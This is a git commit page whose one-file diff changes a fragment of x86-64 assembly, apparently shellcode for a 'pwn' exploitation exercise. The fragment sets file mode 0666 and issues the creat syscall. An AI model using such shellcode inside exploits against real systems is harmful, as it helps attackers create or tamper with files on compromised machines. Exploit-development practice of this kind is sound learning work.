Fix pwn file permissions
This commit is contained in:
parent
b3ba6f0a8b
commit
7b5895f781
1 changed files with 1 additions and 2 deletions
|
@ -8,10 +8,9 @@ p:
|
||||||
xorq %rdi, %rdi
|
xorq %rdi, %rdi
|
||||||
pop %rdi
|
pop %rdi
|
||||||
#shr $0x8, %rdi
|
#shr $0x8, %rdi
|
||||||
push $0xfffffffffffffd66
|
push $0x1b6
|
||||||
xor %rsi, %rsi
|
xor %rsi, %rsi
|
||||||
pop %rsi
|
pop %rsi
|
||||||
neg %rsi
|
|
||||||
push $85
|
push $85
|
||||||
pop %rax
|
pop %rax
|
||||||
syscall
|
syscall
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue